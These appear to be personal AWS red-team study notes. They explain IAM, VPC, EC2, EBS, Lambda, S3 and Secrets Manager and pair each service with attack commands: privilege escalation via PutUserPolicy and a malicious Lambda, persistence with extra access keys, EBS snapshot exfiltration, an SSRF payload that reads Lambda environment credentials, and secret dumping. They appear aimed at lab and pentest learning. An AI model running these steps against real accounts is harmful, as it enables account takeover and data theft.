Cloud
AWS Cheat Sheet

AWS Cloud Overview

AWS Regions and Zones

AWS has 77 Availability Zones within 24 geographic regions around the world. Pasted-image-20220831143413.png

AWS Cloud Architecture

AWS Service Model

Pasted-image-20220831144122.png

AWS Cloud Service Uses

Pasted-image-20220831144257.png

AWS Cloud Services

IAM

IAM Components

  • AWS Identity and Access Management IAM enables you to manage access to AWS services and resources securely.
  • IAM allows:
    1. Manage IAM users, groups and their access.
    2. Manage IAM roles and their permissions.
    3. Manage federated users and their permissions. Pasted-image-20220831145246.png
Users
  • A user is an entity that you create in AWS to represent the person or application that uses it to interact with AWS.
  • A user in AWS consists of a name and credentials.
  • AWS Services Access Types :
    1. Programmatic access
      • Access key ID
      • Secret access key
    2. AWS Management Console access
      • Username
      • Password
Groups
  • A group is a collection of users. Groups let you specify permissions for multiple users, which can make it easier to manage the permissions for those users.
  • Following are some important characteristics of groups:
    1. A group can contain many users, and a user can belong to multiple groups.
    2. Groups can't be nested, They can contain only users, not other groups.
Roles
  • A role is an entity that defines a set of permissions for making AWS service requests.
  • Roles are associated with AWS services such as EC2, RDS etc.
  • Roles are a secure way to grant permissions to entities that you trust. Examples of entities include the following:
    • A user in another account
    • An application code running on an EC2 instance that needs to perform actions on AWS resources
    • An AWS service that needs to act on resources in your account to provide its features
  • Roles issue keys that are valid for short durations, making them a more secure way to grant access. Pasted-image-20220831150456.png
Policies
  • Policies define permissions for an action to perform the operation.
  • For example, if a policy allows the GetUser action, then a user with that policy can get user information from the AWS Management Console, the AWS CLI, or the AWS API.
  • Policies can be attached to IAM identities (users, groups or roles) or AWS resources.

Policy Data:

  1. Effect Use to Allow or Deny Access
  2. Action Include a list of actions (Get, Put, Delete) that the policy allows or denies.
  3. Resource A list of resources to which the actions apply

Policy types:

  1. Inline Policies An inline policy is a policy that's embedded in an IAM identity (a user, group, or role)

  2. Managed Policies

    • AWS Managed Policies
    • Customer Managed Policies Pasted-image-20220831151119.png
STS
  • AWS Security Token Service AWS STS is a web service that enables you to request temporary, limited privilege credentials for AWS IAM users or for users that you authenticate -Federated Users-.
  • STS allows temporary access to an AWS resource using a token.
  • Temporary credentials Contains :
    1. Access key ID
    2. Secret access key
    3. Security token (session token)

Temporary credentials:

  1. STS Endpoints:

  2. AWS Metadata endpoint

Attacking IAM

Enumeration

bash
# check if this key belongs to a user or  a role
aws sts get-caller-identity
 
# List IAM users
aws iam list-users
 
# List the IAM groups that the specified IAM user belongs to 
aws iam list-groups-for-user --user-name username
 
# List managed policies attached to a user
aws iam list-attached-user-policies --user-name username
 
# List Inline Policies of a user
aws iam list-user-policies --user-name username
 
# List IAM Groups
aws iam list-groups
 
# List managed policies attached to user
aws iam list-attached-group-policies --group-name admins
 
# List Inline policies of a group
aws iam list-group-policies --group-name admins
 
# List IAM Roles
aws iam list-roles
 
# List managed policies attached to a role
aws iam list-attached-role-policies --role-name role-name
 
# List inline policies of a role
aws iam list-role-policies --role-name role-name
 
# List of IAM Policies
aws iam list-policies
 
# Get Info about specified managed policy
aws iam get-policy --policy-arn policy-arn
 
# Get Information about the versions of the specified managed policy
aws iam list-policy-versions --policy-arn policy-arn
 
# Get Information about a specified policy version
aws iam get-policy-version --policy-arn policy-arn --version-id version-id
 
# Get spcecified inline policy document embedded in specified IAM user/group/role
aws iam get-user-policy --user-name username --policy-name policy-name
 
# Get spcecified inline policy document for a group
aws iam get-group-policy --group-name groupname --policy-name policy-name
 
# Get spcecified inline policy document for a role
aws iam get-role-policy --role-name rolename --policy-name policy-name

Configure aws profile, profiles are stored in ~/.aws/credentials file

bash
aws configure --profile admin

Execute Commands with different profiles

bash
aws sts get-caller-identity --profile admin

Adding inline policy to a user

bash
aws iam put-user-policy --user-name admin --policy-name Administrator-Policy --policy-document file://Administrator-policy.json --profile root

Attaching a managed policy to a user

  1. create the policy document
    json
    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": "*",
                "Resource": [
                    "*"
                ]
            }
        ]
    }
  2. Create the policy
    bash
    aws iam create-policy --policy-name Administrator-Policy --policy-document file://Administrator-policy.json --profile root
  3. Attach the policy to a user
    bash
    aws iam attach-user-policy --user-name normal-user --profile root --policy-arn arn:aws:iam::492787370120:policy/Administrator-Policy 

Privilege Escalation

Creating the vulnerable example:

  1. Create normal User normal-user
  2. Create the PutUserPolicy document
json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "iam:PutUserPolicy",
            "Resource": [
                "arn:aws:iam::492787370120:user/*"
            ]
        }
    ]
}
  1. Put this policy as inline policy to normal-user
bash
aws iam put-user-policy --user-name normal-user --policy-document file://PutUserPolicy.json --policy-name PutUserPolicy --profile root

Now this user has the power to priv-esc himself or other users to admin

Priv-esc

  1. Get the inline policies of the user
    bash
    aws iam list-user-policies --user-name normal-user --profile normal-user
  2. Get the JSON of the policy
    bash
    aws iam get-user-policy --user-name normal-user --policy-name PutUserPolicy --profile normal-user
  3. After we know that this user can put/attach policies to himself & other users, He can create administrator-policy and put/attach it to himself
  4. Create Administrator-policy.json
json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "*",
            "Resource": [
                "*"
            ]
        }
    ]
}
  1. Put this policy as inline policy to the user

    bash
    aws iam put-user-policy --user-name normal-user --policy-name Administrator-policy --policy-document file://Administrator-policy.json --profile normal-user
  2. Now list the inline policies of this user to make sure that our administrator policy was added

    bash
    aws iam list-user-policies --user-name normal-user --profile normal-user

Persistence

  • If we comprimised the root user, which is highly monitored, we can create another access key for another user, which we will be using if Its first access key was disabled or something Pasted-image-20220904133414.png Note: each user can have only 2 Access keys at once List access keys of a user
bash
aws iam list-access-keys ---user-name admin --profile root

Pasted-image-20220904134646.png as we see, this user has already 2 access keys, Lets try to add another 1 to him

bash
aws iam create-access-key --user-name admin --profile root

Pasted-image-20220904134749.png

Delete access key

bash
aws iam delete-access-key --user-name admin --access-key-id AKIAXFPDKRCEGZZR5WXX --profile root 

create a new access key

bash
aws iam create-access-key --user-name admin --profile root

Pasted-image-20220904145529.png

Credential Access

In this scenario User A has ASSUME ROLE Policy on a privileged Role that has privileges on some resources, as we see in the screenshot Pasted-image-20220912235934.png

Setting Up the vulnerable path:

  • As a revision, note that the role has Access Permission on AWS Resources and has a Trust Relationship that identifies which users/groups can assume this role (as specified in the above pic).
  1. Create our Policy (we'll use the built-in Amazons3FullAccess) policy
  2. Create our role
    • Pasted-image-20220913021945.png
    • The trusted entity (the entity which will assume this role, and in our case it will be an IAM user) Pasted-image-20220913022052.png
    • Adding permissions (we can choose a built-in policy or we can create our own custom policy for this role) Pasted-image-20220913022242.png
    • And this is our final role with its Permissions and Trusted Entities Pasted-image-20220913022612.png
    • aws iam list-roles --profile root we'll see our newly created role Pasted-image-20220913023130.png
  3. Adding sts:assumerole policy to the user we want (normal-user) to assume our role (s3admin) role
    • This permission is added as inline-policy Pasted-image-20220913024227.png
    • choose STS service Pasted-image-20220913024316.png Pasted-image-20220913024351.png
    • check on assumeRole in Action Pasted-image-20220913024500.png
    • Then in resources, we'll put the ARN of the Role (we created) so that this user will be able to assume only this Role, we can set it to All-Resources and it will be able to assume all the roles in the account (only if It's trusted to assume the role in the trust relationship on the role itself). Pasted-image-20220913024809.png
    • create the policy Pasted-image-20220913024910.png
    • Now this user normal-user can assume the s3admin role we created.
  4. If the user donesn't have the sts:assumerole policy, It will get access denied if tried to assume the role, even if the role has the entity trust relationship with this user
    • this is the difference with and without the STS:AssumeRole policy, same command but affter adding the sts:assumerole policy to the user. Pasted-image-20220913025726.png

Abusing the role

  • List IAM Roles `aws iam list-roles --profile root -> a user must have permission to list roles this is a role that our user can assume Pasted-image-20220913030342.png

  • Get Info about this role aws iam get-role --role-name s3admin --profile root -> user must have permission to get info about a role

  • Get role permissions (by listing all managed policies attached to this role)

    bash
    aws iam list-attached-role-policies --role-name s3admin --profile root

    Pasted-image-20220913030914.png

  • list versions of the policy attached to the role

    bash
    aws iam list-policy-versions --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess  --profile root

    Pasted-image-20220913031236.png

  • Get info a bout a specific version

    bash
    aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess --version-id v2 --profile root

    Pasted-image-20220913031402.png

  • Assuming the role to retrieve the temporary credentials

    bash
    aws sts assume-role --role-arn arn:aws:iam::492787370120:role/s3admin --role-session-name s3-access-example --profile normal-user

    Pasted-image-20220913031852.png

  • Now, we have to export these as environment variables (in Linux) so that awscli can use it

    bash
    export AWS_ACCESS_KEY_ID=ASIAXFPDKRCEKQNDODWO
    export AWS_SECRET_ACCESS_KEY=Yu1tT25qMQ/vuN3q4mDa7ipWtjnDytocatfaXem6
    export AWS_SESSION_TOKEN= FwoGZXIvYXdzEBMaDANLr69tIL28ZttWPyK1AZyhxgy2Rw59Iq2W8L4PsF7JnPEgGoLrdEApZ0O7tsb49a1AX4xzc8EOiU9xrp04Qgeqtt59k43GyV0BcNpaR93ZYdS7otMIq8s9i+042AT4XkGxbrrRjfWDlNHfAoMY/3lmCHRcU7v20mDi34cV9/SRh00RuiQcV2Q4Yduj/YQk4D/gMzPjG6jL+nr8kFjaAu+2OsQsOMlp9htTcAk+I0bc3Jec18p5V09A9BxEXBlCJB3bRdUo8bT/mAYyLZsqCeLhIWLifB/XNqmqzxu2DW7gXYRXr/vi7yb2kHwVh06h12y908aMvXJW2Q**
  • And now we can execute commands with the assumed role

    bash
    # Abusing the role permissions on buckets to list s3 buckets
    aws s3 ls --profile normal-user

VPC (Virtual Private cloud)

VPC Overview

Pasted-image-20220917224714.png

Some VPC Concepts

VPC Subnetting

Pasted-image-20220917225144.png

VPC Routing Tables

Pasted-image-20220917225117.png

  • The destination represents the IP range of the destination of the route.
  • If we have a VPC and it's subnetted, each subnet has VPC Internal rule by default, because all subnets should be able to communicate to each other.

IGW Internet Gateway

^1090ea

Pasted-image-20220917225641.png

NAT Gateway

Pasted-image-20220917225836.png

  • We can use NAT gateway to enable instances in private subnet to connect to the internet. but also prevent the internet from connecting initiating a connection to those subnets. Its very important from the security prespictive.

VPC Peering

Pasted-image-20220917230330.png

VPCE VPC Endpoint

Pasted-image-20220917230725.png

  • The normal way for a VPC subnet to access another service (ex: s3 bucket) is by going to the internet and get back the the service.
  • but with VPCE We can access the services directory without the need to go out to the internet. this screen shot shows the difference.
  • Thats why as a Red-Teamer we should always check the routing table.

VPC Network ACLs

Pasted-image-20220917231119.png

  • Notice that in the following screenshot, subnet-00520723a91ff4d54 can access VPC2 through VPC Peering which we can see at the bottom. PCX refers to VPC peering Pasted-image-20220917235344.png
  • Notice in the following screenshot, subnet-0ac4b8aa82d7ab459 doesn't have connection to VPC2 even the other subnet can access it. but as we see in its routing table, It can access the internet through IGW but the other subnet can't. Pasted-image-20220917235624.png

Attacking VPC

Enumeration

bash
# Enumerating VPCs
aws ec2 describe-vpcs 
aws ec2 describe-vpcs --filters="Name=vpc-id,Values=vpc-02cfe2062dcda9dea" 
 
# Enumerating Subnets
aws ec2 describe-subnets
 
# describe subnets in a specific VPC
aws ec2 describe-subnets  --filters="Name=vpc-id,Values=vpc-0b3197963900d5b91"
 
# Enumerating Routes
aws ec2 describe-route-tables
aws ec2 describe-route-tables --filters="Name=vpc-id,Values=vpc-0b3197963900d5b91"
 
# Enumerating ACLs
aws ec2 describe-network-acls

Notes:

  • Each subnet has a Main routing table. The Main route table automatically comes with your VPC and controls routing for all subnets not explicitly associated with another. Pasted-image-20220918003808.png
  • For ACLs, when Egress equals True that means its outgoing connection, and if it equals False that means its an incoming connecting.

Lateral Movement

Pasted-image-20220918011334.png

  • List VPC Peering Connections

    bash
    aws ec2 describe-vpc-peering-connections
  • VPC peering exists between 2 VPCs, one is Requester and other is Accepter, but the connection will be Bidirectional, meaning that EC2s from any of the VPCs can access EC2s from the other VPC. Pasted-image-20220918012426.png

  • Enumerate subnets of the VPCA. because the there might be only 1 subnet in the VPC that can access the other VPC because the routing is done by routing tables and those can be attached at the subnet level. [[CARTS Notes#^220ca5 | Enumerate Subnets]]

  • Enumerate the routing tables of the targeted subnet [[CARTS Notes#^93dc9e | Enumerate routing table of the subnet]] when we see PCX in a routing table, that means there is a peering connection here Pasted-image-20220918013413.png Enumerating routing tables of AWSGoat

  • Enumerate subnets and routing table sof VPCB also, to understand if there is multiple subnets in there, and to know if the VPC peering between the 2 VPCs gives access to all the subnets or just specific ones !.

  • Notes:

    • the private subnet can't be accessed even if we have a access and secret keys, we have to access the public subnet first, and then from it we can access the private subnet. [[CARTS Notes#^1090ea | Look at this screenshot]].
    • If the routing table attached to a subnet contains IGW then its a public subnet because It can access and be accessed through the internet Pasted-image-20220918015111.png
  • Enumerate EC2 instances in a subnet

    bash
    aws ec2 describe-instances --filters="Name=subnet-id,Values=subnet-09d6b4a301512c565"

    AWSGoat has a public subnet - Knew that from enumerating the routing tables of the subnets and I found a subnet that has igw - , meaning that its accessible from the internet Pasted-image-20220918020230.png Now, enumerate instances in this subnet

    bash
    aws ec2 describe-instances --filters="Name=subnet-id,Values=subnet-09d6b4a301512c565"

    found 1 and this is its public IP address Pasted-image-20220918020706.png

  • If we have SSH key and the public IP of the instance, we can access it

  • Lets assume that we were able to find a private key and a username that can access this instance, we can access it like

    bash
    ssh -i id_ed25519 VincentVanGoat@54.147.42.91

    Pasted-image-20220918022241.png what I really did was getting access to the instance from the web portal, and I injected my public key in the authorized_keys file of the VincentVanGoat user. Pasted-image-20220918022405.png

  • The lateral movement example

    1. Access ec2 instance in the public subnet of VPC1 Pasted-image-20220918022955.png
    2. Access ec2 instance in the private subnet of VPC1 using its private IP (because VPC2 is only accessible through the private subnet as it has the VPC peering connection to VPC2). Pasted-image-20220918023153.png
    3. Access ec2 instane in VPC2 through the instance of the private subnet of VPC1 Pasted-image-20220918023338.png

EC2

EC2 Components

  1. AMI Amazon Machine Instance
    • Is like a template to create an instance from.
    • Can be build for Linux & Windows.
    • Why Custom AMI
      • Pre-Installed packages & Software.
      • Faster boot time (No need to use EC2 User Data at boot time).
      • Control of maintinance & Updates.
      • Installing App a head of time (for faster deployment at Auto Scaling).
      • Using someone else's AMI that is optimized for a specific app, DB, ..
    • When you create an AMI it will be stored in S3 but you won't see them in S3 console. they are stored in S3 because Its durable, cheap, and reselient storage where most of the backups will live.
    • By defualt AMI's are private, and locked for your account, and region (won't be available on other regions).
    • U can also make them public and share/rent or sell them to others through AMI Marketplace.
    • To make a custom AMI, go to the EC2 that you want to create a template (AMI) from and ... Pasted-image-20220921223122.png
    • Now we can creat as many EC2s from this AMI
    • When creating a new EC2 Instance, we can choose AMI from: Pasted-image-20220921225804.png
  2. EC2 Instance Access
    1. Linux EC2
      • We have 4 ways to connect to a Linux EC2 Pasted-image-20220921225943.png
      1. SSH client
        • we can connect from anywhere if the EC2 has a public IP using private key Pasted-image-20220921230403.png
      2. EC2 Instance Connect
        • If we clicked connect on the Instance, we'll have 3 ways to connect to it, If we click on Connect, aws will check if the current logged in user to the web portal has the rights to access this EC2 instance, and it will generate a pair of SSH keys (public & private), and inject the public key in the Authorized_keys in the machine for a specific time and use the Private one to LogIn . Pasted-image-20220921230537.png
        • And here is our session Pasted-image-20220921230707.png
      3. Session Manager To use Sessin Manager:
        1. SSM agent should be installed on the EC2 Instance . SSM Agent is installed by default on Amazon Linux based AMIs dated 2017.09 and later Check if amazon-ssm-agent service is running on our EC2 Pasted-image-20220921235115.png
        2. create a role with AmazonSSMManagedInstanceCore policy to be assumed by the instance Pasted-image-20220922000319.png Pasted-image-20220922000435.png
        3. Attach this role to the EC2 instance Pasted-image-20220922000549.png Pasted-image-20220922002042.png
        4. Now our instance will appear in the Session Manager Navigating to Systems Manager -- > Session Manager we'll find our Instance Pasted-image-20220922010805.png 5. And we have our session Pasted-image-20220922010904.png
          Note: The advantage of using Session Manager is that we'll have a history of all the sessions on that instance Pasted-image-20220922011031.png ^33f1d7
      4. EC2 Serial Console Connect to an EC2 Instance as if your keyboard and mouse were physically attached to it, you can see the machine during starting/rebooting Reference: https://www.youtube.com/watch?v=HIkq9go8hcQ (opens in a new tab)
    2. Windows EC2
      • We have 3 ways to connect to a Windows EC2 Pasted-image-20220922004546.png
      1. RDP Pasted-image-20220922004645.png and then we can RDP to the EC2
      2. Session Manager (same as Linux EC2) [[CARTS Notes#^33f1d7 | Linux EC2 access via Session Manager]]
      3. EC2 Serial Console can be used also on [[CARTS Notes#^abb2f0 | Linux EC2 Serial Connect]] Pasted-image-20220922014258.png
  3. Security Group
    • It acts like a Host based firewall to control the Inbound and Outbound traffic to and from the EC2 Instance. Pasted-image-20220922014821.png
    • Difference between Security Group and ACL is that:
      • Security Group acts on the instance level.
      • ACL acts on the subnet level.

EBS

EBS Concepts

  • Stands for Elastic Block Storage.
  • We can consider it like a hard disk to the pc.
  • can be attached and de-attached to EC2 instances.
  • we can attach multiple EBSs to one EC2 instance. but an EBS can only be attached to a single EC2.
  • This is the EBS attached to this EC2 Pasted-image-20221011211127.png Notice also that its the root device, which means it contains the OS that this EC2 is running.
  • We can create an EBS volume by 2 methods:
    • From a new volume.
    • From a snapshot. Pasted-image-20221011212306.png
  • Snapshots are a backeup from the EBS.
  • Snaptshots are stored in S3 buckets.
  • A Snapshot can be used as a volume, or as an AMI.
  • EBS Encryption uses KMS Amazon Management Service for creating encrypted volumes and snapshots.

Attacking EBS

Enumeration

Enumerating volumes

bash
aws ec2 describe-volumes --profile admin

Pasted-image-20221020020117.png

Enumerating snsapshots created by this user

bash
aws ec2  describe-snapshots --owner-ids self --profile admin

Exploitation

Looking at the following example:

Pasted-image-20221020021645.png

We have an EC2 instance that contains sensitive information, but we don't have access to it. so to exfiltrate the data from it we can go around this by:

  1. Creating a snapshot from this EC2 Instance.
  2. Creating a volume from this snapshot.
  3. attaching this volume to a new instance (we created it and we have full access to it).

Steps:

  1. Comprimise a user that has the permissions to create a snapshot, create an EC2 Instance, and other rights needed to perform this attack, and then using IAM policy Simulator we can simulate the permissions and try the commands and see if this user actually has the needed privileges. Pasted-image-20221020023823.png

  2. Identify all the EC2 Instances in the comprimised account

    bash
    aws ec2 describe-instances --profile admin

    Pasted-image-20221020022746.png

    and the highlighted are the attached volumes to this instance.

  3. Identify the volumes and make sure that the volume we are targeting is the one attached to the EC2 we're targeting by comparing the VolumeID.

    bash
    aws ec2 describe-volumes --profile admin

    Pasted-image-20221020023230.png

  4. Create a snapshot from the EC2 Instance

    bash
    aws ec2 create-snapshot --volume-id VolumeID --description "Pentest Snapshot"

If the instance was encrypted it will take longer time to creat the snapshot

  1. List all the snapshots

    bash
    aws ec2 describe-snapshots
  2. Create a volume from this snapshot

    bash
    aws  ec2 create-volume --snapshot-id SnapshotID availability-zone AvailabilityZone
  3. List Instances

    bash
    aws ec2 describe-instances --profile admin
  4. Attach the newly created volume to the instance of choice

    bash
    aws ec2 attach-volume --volume-id VolumeID --instance-id InstanceID --device /dev/xvdb
  5. Mount the volume to the EC2 file system

    bash
    sudo mount /dev/sdfd /new-dir

    Pasted-image-20221020025805.png

Lambda

Concepts

  • Lambda is an event driven and server-less computing platform.
  • Its apiece of code that is executed when its triggered by an event from an event source.
  • It runs code in response to events and automatically manages the computing resources required by that code.
  • Pasted-image-20221029051503.png
  • At first, an event will be triggered from one of the AWS services, athen Lambda will compile and execute the corresponding code on a container.

How Lambda funtion works

  • Pasted-image-20221029052203.png
  1. Lambda function has 2 parts:
    1. Function (source code).
    2. Layer (dependencies).
  • can be created from 1 of 4 options:
    • Pasted-image-20221029053701.png
  1. Lambda function gets deployed (containerized). In this phase it will only consume storage but still not consuming execution resources.

  2. Lambda function gets triggered by 1 of 3 methods:

    • Pasted-image-20221029060101.png ^ca367e ^f1595e
    1. synchronous: will send response when executed API Gateways,and we'll wait for response to come.
    2. asynchronous: AWS services, ex: If a file was uploaded to S3 do something ... but it won't send back any response, hence asynchronous
    3. Stream: If some function is continously triggerd, ex: DynamoDB that is continously changing, or Kinesis
  3. After its triggered, it will be executed

  4. After being executed there is the destination part which is 1 of 3 destinations:

    1. Lambda Trigger another Lambda function.
    2. SNS simple notification services.
    3. SQS simple queue services.
  • Pasted-image-20221029053315.png

API Gateway

  • This is one of the most methods to trigger Lambda functions.
  • Its an AWS service that is used for creating, publishing, maintaining, and securing REST, HTTP, WEB socket APIs.
  • Its components
    • Pasted-image-20221029055213.png
    • Pasted-image-20221029055508.png
  • We are focusing on API Gateway because it can trigger Lambda functions and its one of the most scenarios of abusing Lambda functions.

Notes

  • Lambda functions should have roles to be able to access other services like S3.
  • If we comprimised a Lambda functions we can change the code to escalate our privileges, like for accessing the service we have roles for like S3.

Lambda Lab

bash
terraform init --> 'initialize terraform with configuration from the current folder'
bash
terraform plan --> 'show actions that will be taken, but do not execute actions'
bash
terraform apply --> 'execute actions'
bash
terraform destroy --> 'Destroy the resources we created'
  • After reading the code of the Lambda function Pasted-image-20221029070044.png
  • I found the API has a back-door Pasted-image-20221029065930.png Pasted-image-20221029065959.png

Attacking Lambda

Enumeration

  • List all Lambda functions
    bash
    aws lambda list-functions

Output Pasted-image-20221101131308.png 3 Important things to look at here:

  1. RunTime --> denotes the programming language.
  2. Roles --> specifies which roles does this lambda function has over other aws services.
  3. Layers --> specifies the 3rd party libraries that are being used in the code.
  • Enumerate source-code of the functions

    bash
    aws lambda get-function --function-name RedTeamfunc1

    output Pasted-image-20221101131927.png 2 things to look at here:

    1. This lambda function is stored in S3
    2. this is a URL of an S3 bucket where we can download the source-code of this lambda function and its only valid for sometime.
  • Enumerate who can execute/invoke this lambda function in synchronous AND asynchronous

    bash
    aws lambda get-policy --function-name Redteamfunc1

    output Pasted-image-20221101134224.png

  • Enumerate who can execute/invoke this lambda function in stream way.

    bash
    aws lambda list-event-source-mappings --funciton-name
  • Enumerate Layers this will list all the layers (dependencies) in aws account

    bash
    aws lambda list-layers

    Gives all information about a specific layer / dependency

    bash
    aws lamabda get-layer-version --layername layer-name --version version-number

    output we get some information and a time-based URL to download this layer / dependency Pasted-image-20221101135520.png

Exploitation

Note:

  • Lambda functions have aws access keys in their environment variables, try to enumerate those variables to get aws access key id and aws access secret key We can have initial access via 2 methods:
  1. RCE In this example we have an RCE vuln Pasted-image-20221102001531.png
  2. Get credentials which can be stored in
    1. Lambda code

    2. Environment variables Can get it through: -RCE vulnerability Pasted-image-20221102002821.png echo this response in terminal to beautify it Pasted-image-20221102002906.png by using these credential data AWS_ACCESS_KEY_ID, AWS_ACCESS_SECRET_KEY, AWS_SESSION_TOKEN, we are able to connect to aws as this account Pasted-image-20221102011356.png

      • SSRF vulnerability use ?url=file://127.0.0.1/proc/self/environ
      • CLI access

Persistence

  • We can edit the Lambda function code itself, but this can be detected easily.
    • updated the cmd parameter here to c Pasted-image-20221102022841.png
    • Now update the lambda function -- It didn't work for me despite the trouble shooting ☹️
      bash
      aws lambda update-function-code --function-name myfunction --zip-file fileb://lambda_function.py.zip --profile lambda-role-admin --region us-east-1
  • We can edit the layers / dependencies of the code, this is less detectible.

Privilege Escalation

Difference between: AttachRole: attach a role to an existing entity. PassRole: attach a role to an entity while creating it. Pasted-image-20221102034621.png In this privilege escalation scenario we have a comprimised user that has 2 permisssions:

  1. PassRole
  2. CreateFunction with those 2 permission we can abuse this user to create a Lambda Function with privilege-escalation code. which will grant this user Administrator access. Created a new user with the same permissions as in the video.

Attack Steps:

  1. Created our malicious priv-esc Lambda function code
    bash
    import boto3
    import json
    def lambda_handler(event, context):
        iam = boto3.client("iam")
        iam.attach_role_policy(RoleName="lambda-function-role", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",)
        iam.attach_user_policy(UserName="admin-database", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess",)
    return {
        'statusCode':200,
        'body':json.dumps("AWS Red Team")
            
    }
  2. created the Lambda function
    bash
    aws lambda create-function --function-name test --runtime python3.7 --zip-file fileb://test.zip --handler test.test --role arn:aws:iam::492787370120:role/lambda-function-role --region us-east-1 --profile admin-database
    Pasted-image-20221102053847.png
  3. Invoke the lambda function we can invoke it with 1 of the 3 methods [[CARTS Notes#^f1595e | Lambda Triggers]] , but here we have full access to Lambda so we can Invoke this function from aws-cli
    bash
    aws lambda invoke --function-name test response.json --region us-east-1 --profile admin-database
  4. Get our newly attached policies
    bash
     aws iam list-attached-user-policies --user-name admin-database  --profile admin-database
    Pasted-image-20221102060554.png

API Gateway

Attacking API Gateway

Enumeration

In AWS we have 3 types of APIs

  1. REST API
  2. HTTP API
  3. Web socket API

We'll enumerate each part of API Gateway Pasted-image-20221101173456.png

  • List all APIs

    bash
    aws apigateway get-rest-apis

    output Pasted-image-20221101171703.png

  • Get info about a specific API

    bash
    aws apigateway get-rest-api --rest-api-id api-d
  • Get info about resources / endpoints

    bash
    aws apigateway get-resources --rest-api-id api-id

    we have 2 resources here / and /system, notice also that /system supports GET method only

    Pasted-image-20221101172323.png

  • Get info about a specific resource

    bash
    aws apigateway get-resources --rest-api-id api-id --resource-id
  • Get info about methods

    bash
    aws apigateway get-method --rest-api-id api-id --resource-id resource-id --http-method Method

    Pasted-image-20221101173213.png Notice that this endpoint doesn't required apikey to use GET on it.

  • Get stages

    bash
    aws apigateway get-stage --rest-api-id api-id

    Pasted-image-20221101173849.png

  • Get info about specific stage

    bash
    aws apigateway get-stage --api-id api-id --stage-name stage-name
  • gettin info about parameters -we can get such info by reading the code of the lalmbda function that corresponds to such URL.

  • Getting info about API keys

    bash
    aws apigateway get-api-keys --include-values

    Pasted-image-20221101174209.png

    bash
    aws apigateway get-api-key --api-key-id api-key-id

S3

  • Allows users to store any amount of data.
  • Pasted-image-20221105191113.png
  • S3 service contains :
    • buckets :
      • Are like folders.
      • A bucket is a container for objects stored in S3
    • Objects:
      • Are like files.
      • Are fundamental entities stored in S3
    • Keys:
      • A key is the unique identifier for an object within a bucket
      • Ex:
        • URL https://bucket-name.s3.region.amazonaws.com/folder1/object3.jpeg
        • key: folder1/object3.jpeg
    • Regions:
      • Are geographical where S3 will store your objects you create.
      • ex: us-east-1

S3 Access Policies

  • Resource-Based policies:

    • Are attached to a resource, S3 buckets or object.
    • with it we can specify who has access to the resource and what actions they can perform on it.
    • It has 4 types:
      • Public Access
      • ACLs: are for both Bucket level and Object level.
      • Bucket Policies: Only for bucket level (condition-based).
      • Pre-signed URLs: Are time-limited URLs, and We can generate a URL for the resource, this URL will be only valid for a period of time we define. Pasted-image-20221106002002.png Pasted-image-20221106002044.png

    Notes:

    • Public Access Policy: has high priority over other policies, and in which we can allow or deny the public access to all buckets & objects instantly. Pasted-image-20221105221935.png
    • whenever we see principal attribute, that means this is a Resource-Based policy Pasted-image-20221106000822.png
  • Identity-Based policies:

    • Are attached to an IAM User, group or role.
    • Let us specify what the identity can do.
    • Permissions are attached to the intity through policies Pasted-image-20221106001653.png Pasted-image-20221106001722.png

Attacking S3

Enumeration

  • List all buckets in aws account

    bash
    aws s3api list-buckets
  • Get info about bucket ACL

    bash
    aws s3api get-bucket-acl --buckt bucket-name
    • This AllUsers means Its open for public. Pasted-image-20221107025937.png
    • This means that all AuthenticatedUsers can read ACP (Access Control Policy) Pasted-image-20221107030232.png
  • Get info about bucket policy

    bash
    aws s3api get-bucket-policy --bucket bucket-name
  • Retrieve public-access-block configuration of an aws

    bash
    aws s3api get-public-access-block --bucket bucket-name
    • Pasted-image-20221107031142.png
  • List Objects in a bucket

    bash
    aws s3api list-objects --bucket-name bucket-name	
  • Get ACL of an object

    bash
    aws s3api get-object-acl --bucket bucket-name --key object-name

Exfilteration

  1. URL: Pasted-image-20221107031939.png
  2. Pre-Signed URL:
    • Generate pre-signed-url
      bash
      aws s3api presign s3://bucket-name/object-name --expires-in 
    • We can access it directly from any browser
  3. Authenticated-Users using CLI/API
    bash
    aws s3api get-object --bucket-name bucket-name --key object-name download-file-location

Secret Manager

  • Its an AWS service that encrypts & stores sensitive data transparently.
  • Its designed to store application credentials that are changed periodically and con't be stored in plain-text.
  • Types of secrets we can store
    • Pasted-image-20221108035604.png
  • It uses key from AWS KMS (Key Management service) to encrypt & decrypt secrets (password, ssh private-key, ..) stored in the Secrets Manager
  • Pasted-image-20221108034548.png
  • Pasted-image-20221108035146.png
  • We can assign permissions to access these secrets via 2 type sof policies:
    • Resourse-Based Policies:
      • We can define the policy on the Secret itself.
    • Identity-Based Policies
      • We can define the policy on the entity that should access the secret.

KMS

  • Key Management Server, Its a service used to managae cryptographic keys.
  • Its used by the Secrets Manager that uses its keys to encrypt/decrypt its secrets.
  • It has 2 main keys:
    • CMK customer master key
      • Here is how we create a CMK
      • Pasted-image-20221108040551.png
    • AMK AWS Managed key
      • Ex: the Secrets Manager creates a key in the KMS authmatically when its initiated.

Attacking Secret Manager

Enumeration

bash
# List Secrets in `Secrets-Manager`
aws secretsmanager list-secrets
 
# Describe specific secret
aws secretsmanager describe-secret --secret-id secretid
 
# Get a specific secret
aws secretsmanager get-secret-value --secret-id secretid
 
# Get  `resource-bsed policy` of a specific secret
aws secretsmanager get-resource-policy --secret-id secretid
 
# List keys
aws kms list-keys
 
# Describe a specific key
aws kms describe-key --key-id keyid
 
# List policies attached to a key
aws kms list-key-policies --key-id keyid
 
# Get full info about a key policy
aws kms get-key-policy --key-id keyid --policy-name policyname
 
# Decrypt  files with `KMS`
aws kms decrypt --ciphertext-blob fileb://encrypted-file.txt -output text/other-file-format 

RDS

  • Relational Database Services.
  • Its a web service that facilitates operating/scaling Relational databases (Maria-Db, MySQL-DB, Amazon Aurora-DB, SQL-Server, PostgreSQL).

RDS Authentication Methods:

  • Pasted-image-20221108061453.png
  • Password
  • Password + IAM
    • by using an IAM role, the role will be generated a token that will only be valid for 15 mins.
  • Password + Kerberos Based
